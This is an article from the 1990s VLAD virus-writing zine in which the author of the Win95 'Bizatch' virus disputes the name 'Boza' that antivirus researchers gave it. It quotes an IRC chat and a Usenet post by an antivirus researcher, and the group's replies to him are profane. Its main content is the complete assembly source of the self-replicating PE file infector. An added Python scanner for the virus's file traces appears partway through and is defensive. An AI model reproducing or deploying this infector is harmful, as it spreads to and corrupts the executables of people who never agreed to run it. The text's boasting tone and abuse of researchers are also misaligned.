The Boza Situation by Quantum / VLAD
------------------------------------
On the 29th of January 1996 I was directed to an article at
http://www.sophos.com about the "world's first win95 virus". Although
the article stated that the virus was written in Australia - it did not
state by whom the virus was written, and even though vlad was mentioned
(the new object created by Bizatch is ".vlad") it does not actually
state we wrote it.
While I was investigating the appearance, I had this conversation with the
#antivirus moderator, Hermanni:
-----------------------------------------------------------------------------
-> *hermanni* you conscious ?
yeah.
-> *hermanni* I don't know you.. and I doubt you know me.. but I hear you are
rather well known in the AV community
*Hermanni* no, i don't think i know you.
-> *hermanni* neways.. do you happen to know a guy by the name of Paul
Ducklin ? AVer with a group called Sophos.. ?
*Hermanni* yes, i know paul. duck@sophos.com
-> *hermanni* ok.. he has written an article and had it placed on the sophos
www site.. it is about the world's first win95 virus..
-> *hermanni* I wrote this virus and I have mailed him at that address to
tell him this and I have gotten no reply -> *hermanni* you see.. he has
plucked a name for the virus out of the air he calls it "boza" .. even
tho there are massive ascii strings in it clearly stating that the virus
is called "bizatch"
-> *hermanni* eg Please note: the name of this virus is [Bizatch] written by
Quantum of VLAD
-> *hermanni* rather annoying..
*Hermanni* yes, we're calling to 'Boza' as well. it's a good name.
-> *hermanni* it's NOT a good name.. where did you get "boza" from ?!!?
*Hermanni* well, we called it _3192 for some time, then somebody thought
'Boza' would be more descriptive.
*Hermanni* i believe solomon and mcafee are calling it Boza as well.
-> *hermanni* calling it boza is not in your best interests.. paul ducklin is
-> *hermanni* going to look rather silly when vlad 6 comes out and it is
-> *hermanni* painfully obvious that the name was made up and the true name
-> *hermanni* was in the middle of the virus.. did you all even look for
-> *hermanni* strings ?
*Hermanni* hey, the name has already been decided.
*Hermanni* too late to complain, i'm afraid.
*Hermanni* do you have any idea how painful it is to get all the antivirus
vendors to change a name of a virus?
-> *hermanni* no.. the name was chosen when I wrote the virus.. the name was
chosen when it escaped from our test systems and spread to every fewl who
copies win95 executables..
-> *hermanni* are you aware of how annoying it is to sit and choose a virus
name only to have it ignored by AV "researchers" ?
too bad, i gotta go
chat with you another time.
bye
fine.. perhaps Virus Bulletin Magazine will do a better job
and if they do.. on your square head be it
*** QuantumG has left channel #antivirus
-----------------------------------------------------------------------------
Generally, I think anti-virus authors need to adopt a much more professional
attitude.
Contrary to Paul Ducklin's claims, he (and Sophos) was not the first
antivirus company to discover this virus. It seems that AVP was the
first to "discover" it:
-----------------------------------------------------------------------------
Win95.Boza
It is not a dangerous parasitic NewEXE(PE)-virus. It searches for
EXE-files, checks the files for PE signature, then creates in
EXE-file new section named ".vlad", and writes its code into that
section.
While infecting that virus uses calls to functions GetDir, SetDir,
FindFirst, FindNext, OpenFile, LSeek, Read, Write, and CloseFile.
First, it gets the current directory, and checks the Windows95
kernel for some specific code. Then the virus searches for
.EXE-files, and checks them for PE signature. Then the virus
increases NumberOfSections field in PE-header, writes into the file
new Section Header that describes new Section in the file, and
writes itself to the end of the file.
While executing the virus infects up to 3 files, and looks for
.EXE-files in parent directories, if there are no more .EXE-files in
the current one. Before return to the host program the virus
restores the current directory.
The virus checks some data (the system date?) and in some cases
displays the messages:
Bizatch by Quantum / VLAD
The taste of fame just got tastier!
VLAD Australia does it again with the world's first Win95 Virus
From the old school to the new..
Metabolis
Qark
Darkman
Automag
Antigen
RhinceWind
Quantum
Absolute Overlord
CoKe
The virus also contains the internal text strings:
.vlad
Please note: the name of this virus is [Bizatch] written by Quantum of VLAD
The virus is not bug-free, and in some cases Windows95 displays an
error message while executing infected EXE-files.
-----------------------------------------------------------------------------
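The infection method described above (a new section added, NumberOfSections bumped, the code appended after the last section, the entry point redirected) leaves fixed traces in a file's headers. As an added example that is not part of the original article or of the VLAD code, here is a Python scanner that parses PE32 headers and reports those traces: a section named ".vlad", the 0F00Dh value the listing further down stores at PE header offset 4Ch (the reserved Win32VersionValue field of the optional header), an entry point that lands inside the last section, and the "[Bizatch]" string. The `build_pe` helper, the two sample files it assembles and the indicator wording are constructed for this example; the samples carry only the visible traces, not the virus code.

```python
import struct

# Indicators taken from the AVP description and the Bizatch listing on this page.
VLAD_SECTION = b".vlad"
INFECTION_MARK = 0xF00D          # stored in Win32VersionValue (PE header + 4Ch)
MARKER_STRING = b"[Bizatch]"

def parse_pe(data):
    """Parse the headers of a PE32 file into the fields the scan needs.
    Raises ValueError if the data is not a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                       # start of the optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i         # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "win32_version_value": struct.unpack_from("<I", data, opt + 52)[0],
            "sections": sections}

def scan_for_boza(data):
    """Return the Bizatch/Boza indicators found in a PE32 file (empty if clean).
    Each indicator is checked independently so a partial match is still reported."""
    pe = parse_pe(data)
    hits = []
    if any(s["name"] == VLAD_SECTION for s in pe["sections"]):
        hits.append("section named .vlad")
    if pe["win32_version_value"] == INFECTION_MARK:
        hits.append("Win32VersionValue set to 0xF00D infection marker")
    if len(pe["sections"]) > 1:               # heuristic for appending infectors
        last = pe["sections"][-1]
        span = max(last["vsize"], last["rawsize"])
        if last["vaddr"] <= pe["entry_rva"] < last["vaddr"] + span:
            hits.append("entry point inside the last section (appended-code heuristic)")
    if MARKER_STRING in data:
        hits.append("marker string [Bizatch] present")
    return hits

def build_pe(sections, entry_rva, win32_version_value=0, bodies=None):
    """Assemble a minimal PE32 file for testing. `sections` is a list of
    (name, virtual_address, raw_size, characteristics); raw data follows the
    headers in order, filled from `bodies` (name -> bytes) or zeros.
    Constructed fixture: the section contents are filler, not a real program."""
    file_align = 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    coff = struct.pack("<IHHIIIHH", 0x00004550, 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)            # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x00400000)           # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)               # SectionAlignment
    struct.pack_into("<I", opt, 36, file_align)           # FileAlignment
    struct.pack_into("<I", opt, 52, win32_version_value)  # reserved field Bizatch marks
    struct.pack_into("<I", opt, 56, max(s[1] for s in sections) + 0x1000)  # SizeOfImage
    struct.pack_into("<I", opt, 60, file_align)           # SizeOfHeaders
    out = bytearray(dos + coff + opt)
    rawptr = file_align
    for name, vaddr, rawsize, chars in sections:
        out += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), rawsize, vaddr,
                           rawsize, rawptr, 0, 0, 0, 0, chars)
        rawptr += rawsize
    out += b"\0" * (file_align - len(out))                # pad headers to FileAlignment
    for name, _, rawsize, _ in sections:
        out += (bodies or {}).get(name, b"")[:rawsize].ljust(rawsize, b"\0")
    return bytes(out)

# Constructed samples: a clean two-section file and one carrying only the visible
# Bizatch traces (marker field, appended ".vlad" section owning the entry point,
# and the name string). The section flags 40h,0,0,0C0h follow the listing.
CLEAN_SAMPLE = build_pe(
    [(b".text", 0x1000, 0x200, 0x60000020), (b".data", 0x2000, 0x200, 0xC0000040)],
    entry_rva=0x1010)
INFECTED_SAMPLE = build_pe(
    [(b".text", 0x1000, 0x200, 0x60000020), (b".data", 0x2000, 0x200, 0xC0000040),
     (b".vlad", 0x3000, 0x200, 0xC0000040)],
    entry_rva=0x3000, win32_version_value=INFECTION_MARK,
    bodies={b".vlad": b"\xcc" * 64 + b"Please note: the name of this virus is [Bizatch]"})

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(label, scan_for_boza(sample) or ["no indicators"])
```

The section-name and Win32VersionValue checks are exact matches for this one family; the entry-point check is a generic heuristic for appending infectors and will also fire on legitimately packed files, so it is reported separately rather than treated as a verdict on its own.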
The claim of bugs in the virus is not without reason. There ARE bugs
in the "Boza" virus. As stated - Boza is a beta of Bizatch. The bugs
are fixed in the final release (thus the word beta!).
(Quantum made a slight error here in the first release of vlad#6,
on behalf of him, I'd like to apologise to Sara Gordon. In the
future he will make sure he confirms any information he receives.)
Looking through the alt.comp.virus news area, Metabolis came across a posting
by Vesselin Bontchev. He has replied to it and I will include that reply
here:
-----------------------------------------------------------------------------
>> This morning on local news programs they are reporting (from the UK)
>> discovery of a virus out of Bulgaria called the BOZA virus, which
>> purportedly infects only Windows 95 systems, plus some related executable
>> files, and displays a message...anyone heard of this or is this just
>> another "chicken little" story...
> The story is rather funny, folks. Here are some "insider" details.
> First, the main thing in the story is right - the first Win95-specific
> virus (or, more exactly, the first PE-EXE infector) has been found.
> The rest is... well... a news report.
> The virus is written by the Australian virus writing group VLAD. It
> was intended to be published in the next issue of their virus writing
> electronic newsletter. However, they were obviously so proud with what
> they have done, that they didn't have the patience to wait for the
> official release of the newsletter and "leaked" the virus to the
> anti-virus people. After all, the "avers" know more than anyone else
> about viruses, so they should be the most able to appreciate the new
> "achievement".
What you anti virus people have, is a beta of our virus. We gave it to
a couple of people to test for us, and all of a sudden you guys seem to
have the source. Leaking source to you would be the last thing I'd do.
> I first heard about this virus from a contact of mine in Germany - but
> didn't get a sample. (And didn't insist on one, BTW. Big deal, a
> PE-EXE infector. When it appears, we'll see it.) A few days ago we
> (CARO) got a sample sent to us by one of our members - Eugene
> Kaspersky; the author of AVP. Another CARO member works for the
> British anti-virus company Sophos. Obviously, Sophos have decided that
> the virus is worth making a noise about it in the media and has
> published a press release - which then has been copied and interpreted
> freely by the major media agencies.
Indeed, yet another media scare which will make you anti virus people a
lot of money, I mean come on.. stop complaining. We line your pockets.
> I, personally, think that the virus is not worth the noise. C'mon,
> folks, it is just a silly non-resident EXE-only infector, which works
> only in 32-bit environments using the PE-EXE format (like Win95,
> WfW+WinG, or WinNT). FYI, "PE" stands for "Portable Executable". Such
> programs are supposed to be able to run in all the three environments
> mentioned above. On the top of that, the virus is buggy as hell -
> infected files sometimes become megabytes long. In short, it has
> virtually zero chances to spread and become a threat. On the top of
> that, the media quoted Sophos as "one British company", so they didn't
> get even advertising value from their press release. And it was
> certainly not them who discovered the virus.
Well gee, I wonder why the virus is buggy.. it's a beta!! Not supposed
to be released. You'll have to wait for the magazine to get the full
release. As for it being silly, well.. do you see any others around? We
had to start somewhere..
> Now, about the virus name. That's the funniest part of the story. The
> virus contains several text strings, among which the phrase "Please
> note: the name of this virus is [Bizatch] written by Quantum of VLAD".
> It seemed that the virus writer who goes under the handle "Quantum"
> *very* much wanted to have "his" virus named "Bizatch". Well, we're
> not in the business of satisfying the virus writers' need for fame, so
> we (CARO) decided to name the virus differently, just out of spite. :-)
Do you guys have anything better to be doing other than spiting virus
authors?
> But how to name it? Some trivial name was proposed - like V32 (for
> 32-bit virus), but that looked too generic to me. Then I had an
> inspiration! The wannabe name of the virus sounded a bit like the
> Bulgarian word "boza". In Bulgarian (and probably in Turkish), this
> word means a drink made of millet (and, as the rumour goes, of candies
> that have spoiled), which is semi-liquid and tends to ferment quickly
> (has to be consumed within 48 hours, or it gets spoiled) and has about
> 0.5% alcohol. It is something I call "the undrinkable Bulgarian
> drink", because most foreigners find it of horrible taste and tend to
> throw up after drinking it - while I (and many Bulgarians) find it
> delicious. :-) The drink has a light-brown color, is semi-liquid and
> looks like - yes, you guessed it.
> Furthermore, there is a Bulgarian slang expression "this is a complete
> 'boza'", meaning that something is totally messed-up/screwed-up (it's
> used only for things; not for situations). This is the expression a
> Bulgarian would use when faced with spaghetti code or an incredibly
> buggy program. (Right, Windoze is a complete 'boza' too.) Since the
> virus in question is rather buggy, since there is at least one
> Bulgarian virus writer in Australia (going by the handle "Levski"),
> and since the term has a slightly offensive meaning when applied to a
> program, I thought that it would be a perfect name for this particular
> virus. Well, so it stuck. (The 'boza' is a sticky drink too.) :-)
Levski would like to code a virus I'm sure, but at this moment in time
writing anything in asm would be an impossibility. Mainly because he
isn't a coder. Next time you want to accuse someone of something, get
your facts straight first.
> So, to summarize, yes, the Boza virus really exists, yes, it displays
> a message in a window praising its creators, and no, it is not any
> serious threat. As usual, you can ignore almost everything the media
> says about computer viruses. It's real but it's not the end of the
> world, folks. Just yet another stupid virus out there - one which
> (thank goodness) has no chances to spread.
Suck my dick.. when you understand what you're talking about, then come to
me and tell me something. Until then, fill your pockets with the money from
what we make and live for. Fuck you.
Metabolis.
-----------------------------------------------------------------------------
Bontchev, like most AVers, has a high opinion of himself. Giving a virus
multiple names will only confuse people who have the misfortune of coming
in contact with it. Whoever released this beta of a virus into the wild
was very irresponsible - what's worse is they humiliated me in front of the
VX and AV community. You have gained yourself at least one enemy.
Here is the beta of Bizatch (the actual virus code) that AV authors
around the world are calling "Boza".
-----------------------------------------------------------------------------
vladseg segment para public 'vlad'
assume cs:vladseg
vstart:
call recalc
recalc:
pop ebp
mov eax,ebp
db 2dh
subme dd 30000h + (recalc - vstart)
push eax
sub ebp,offset recalc
mov eax,[ebp + offset kern2]
cmp dword ptr [eax],5350fc9ch
jnz notkern2
mov eax,[ebp + offset kern2]
jmp movit
notkern2:
mov eax,[ebp + offset kern1]
cmp dword ptr [eax],5350fc9ch
jnz nopayload
mov eax,[ebp + offset kern1]
movit:
mov [ebp + offset kern],eax
cld
lea eax,[ebp + offset orgdir]
push eax
push 255
call GetCurDir
mov byte ptr [ebp + offset countinfect],0
infectdir:
lea eax,[ebp + offset win32_data_thang]
push eax
lea eax,[ebp + offset fname]
push eax
call FindFile
mov dword ptr [ebp + offset searchhandle],eax
cmp eax,-1
jz foundnothing
gofile:
push 0
push dword ptr [ebp + offset fileattr]
push 3
push 0
push 0
push 80000000h + 40000000h
lea eax,[ebp + offset fullname]
push eax
call CreateFile
mov dword ptr [ebp + offset ahand],eax
cmp eax,-1
jz findnextone
push 0
push 0
push 3ch
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push 4
lea eax,[ebp + offset peheaderoffset]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push 58h
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
cmp word ptr [ebp + offset peheader],'EP'
jnz notape
cmp word ptr [ebp + offset peheader + 4ch],0F00Dh
jz notape
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
mov word ptr [ebp + offset peheader + 4ch],0F00Dh
xor eax,eax
mov ax, word ptr [ebp + offset NtHeaderSize]
add eax,18h
mov dword ptr [ebp + offset ObjectTableoffset],eax
mov esi,dword ptr [ebp + offset ObjectTableoffset]
lea eax,[ebp + offset peheader]
add esi,eax
xor eax,eax
mov ax,[ebp + offset numObj]
mov ecx,40
xor edx,edx
mul ecx
add esi,eax
inc word ptr [ebp + offset numObj] ; inc the number of objects
lea edi,[ebp + offset newobject]
xchg edi,esi
mov eax,[edi-5*8+8]
add eax,[edi-5*8+12]
mov ecx,dword ptr [ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset RVA],eax
mov ecx,dword ptr [ebp + offset filealign]
mov eax,vend-vstart
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicalsize],eax
mov ecx,dword ptr [ebp + offset objalign]
mov eax,vend - vstart + 1000h
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset virtualsize],eax
mov eax,[edi-5*8+20]
add eax,[edi-5*8+16]
mov ecx,dword ptr [ebp + offset filealign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicaloffset],eax
mov eax,vend-vstart+1000h
add eax,dword ptr [ebp + offset imagesize]
mov ecx,[ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset imagesize],eax
mov ecx,10
rep movsd
mov eax,dword ptr [ebp + offset RVA]
mov ebx,dword ptr [ebp + offset entrypointRVA]
mov dword ptr [ebp + offset entrypointRVA],eax
sub eax,ebx
add eax,5
mov dword ptr [ebp + offset subme],eax
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile
inc byte ptr [ebp + offset countinfect]
push 0
push 0
push dword ptr [ebp + offset physicaloffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push vend-vstart
lea eax,[ebp + offset vstart]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile
notape:
push dword ptr [ebp + offset ahand]
call CloseFile
findnextone:
cmp byte ptr [ebp + offset countinfect],3
jz outty
lea eax,[ebp + offset win32_data_thang]
push eax
push dword ptr [ebp + offset searchhandle]
call FindNext
or eax,eax
jnz gofile
foundnothing:
xor eax,eax
lea edi,[ebp + offset tempdir]
mov ecx,256/4
rep stosd
lea edi,[ebp + offset tempdir1]
mov ecx,256/4
rep stosd
lea esi,[ebp + offset tempdir]
push esi
push 255
call GetCurDir
lea eax,[ebp + offset dotdot]
push eax
call SetCurDir
lea edi,[ebp + offset tempdir1]
push edi
push 255
call GetCurDir
mov ecx,256/4
rep cmpsd
jnz infectdir
outty:
lea eax,[ebp + offset orgdir]
push eax
call SetCurDir
lea eax,[ebp + offset systimestruct]
push eax
call GetTime
cmp word ptr [ebp + offset day],31
jnz nopayload
push 1000h
lea eax,[ebp + offset boxtitle]
push eax
lea eax,[ebp + offset boxmsg]
push eax
push 0
call MsgBox
nopayload:
pop eax
jmp eax
kern dd 0BFF93B95h
kern1 dd 0BFF93B95h
kern2 dd 0BFF93C1Dh
GetCurDir:
push 0BFF77744h
jmp [ebp + offset kern]
SetCurDir:
push 0BFF7771Dh
jmp [ebp + offset kern]
GetTime:
cmp [ebp + offset kern],0BFF93B95h
jnz gettimekern2
push 0BFF9D0B6h
jmp [ebp + offset kern]
gettimekern2:
push 0BFF9D14eh
jmp [ebp + offset kern]
MsgBox:
push 0BFF638D9h
jmp [ebp + offset kern]
FindFile:
push 0BFF77893h
jmp [ebp + offset kern]
FindNext:
push 0BFF778CBh
jmp [ebp + offset kern]
CreateFile:
push 0BFF77817h
jmp [ebp + offset kern]
SetFilePointer:
push 0BFF76FA0h
jmp [ebp + offset kern]
ReadFile:
push 0BFF75806h
jmp [ebp + offset kern]
WriteFile:
push 0BFF7580Dh
jmp [ebp + offset kern]
CloseFile:
push 0BFF7BC72h
jmp [ebp + offset kern]
countinfect db 0
win32_data_thang:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 14 dup (0)
boxtitle db "Bizatch by Quantum / VLAD",0
boxmsg db "The taste of fame just got tastier!",0dh
db "VLAD Australia does it again with the world's first Win95 Virus"
db 0dh,0dh
db 9,"From the old school to the new.. ",0dh,0dh
db 9,"Metabolis",0dh
db 9,"Qark",0dh
db 9,"Darkman",0dh
db 9,"Automag",0dh
db 9,"Antigen",0dh
db 9,"RhinceWind",0dh
db 9,"Quantum",0dh
db 9,"Absolute Overlord",0dh
db 9,"CoKe",0
message db "Please note: the name of this virus is [Bizatch]"
db " written by Quantum of VLAD",0
orgdir db 256 dup (0)
tempdir db 256 dup (0)
tempdir1 db 256 dup (0)
dotdot db "..",0
systimestruct:
dw 0,0,0
day dw 0
dw 0,0,0,0
searchhandle dd 0
fname db '*.exe',0
ahand dd 0
peheaderoffset dd 0
ObjectTableoffset dd 0
bytesread dd 0
newobject:
oname db ".vlad",0,0,0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0,0,0
objectflags db 40h,0,0,0c0h
peheader:
signature dd 0
cputype dw 0
numObj dw 0
db 3*4 dup (0)
NtHeaderSize dw 0
Flags dw 0
db 4*4 dup (0)
entrypointRVA dd 0
db 3*4 dup (0)
objalign dd 0
filealign dd 0
db 4*4 dup (0)
imagesize dd 0
headersize dd 0
vend:
db 1000h dup (0)
ends
end vstart
;------------------------------------------------------------------------------